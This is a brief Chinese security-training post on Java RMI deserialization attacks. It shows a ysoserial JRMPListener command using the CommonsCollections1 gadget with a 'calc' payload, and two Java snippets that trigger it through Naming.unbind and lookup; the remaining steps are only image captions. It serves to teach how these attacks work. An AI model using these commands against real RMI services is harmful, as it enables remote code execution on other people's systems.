java安全-02RMI

访客 402 0
本文来源:

攻击方式

注册端攻击服务端

java -cp .\ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "calc"
    public static void main(String[] args) throws RemoteException, MalformedURLException, NotBoundException, RemoteException {        //开启一个恶意的reg,然后server去过去链接注册,则会中招        String url = "rmi://127.0.0.1:1099/setUser";        Naming.unbind(url);    }

java安全-02RMI-第1张图片-网盾网络安全培训

注册端攻击客户端

    public static void main(String[] args) {        //PS F:\tools\EXP> java -cp .\ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "calc"        try{            String url = "rmi://127.0.0.1:1099/exp";            User user = (User) Naming.lookup(url);
        }catch(Exception e){            e.printStackTrace();        }    }

服务端攻击注册端

  1. 注册端开启

java安全-02RMI-第2张图片-网盾网络安全培训

  1. Server端利用CC1进行攻击

java安全-02RMI-第3张图片-网盾网络安全培训

java安全-02RMI-第4张图片-网盾网络安全培训

服务端攻击客户端

  1. 服务端将恶意类注册

java安全-02RMI-第5张图片-网盾网络安全培训

  1. 客户端加载执行

java安全-02RMI-第6张图片-网盾网络安全培训

java安全-02RMI-第7张图片-网盾网络安全培训

标签: java java安全

发表评论 (已有0条评论)

还木有评论哦,快来抢沙发吧~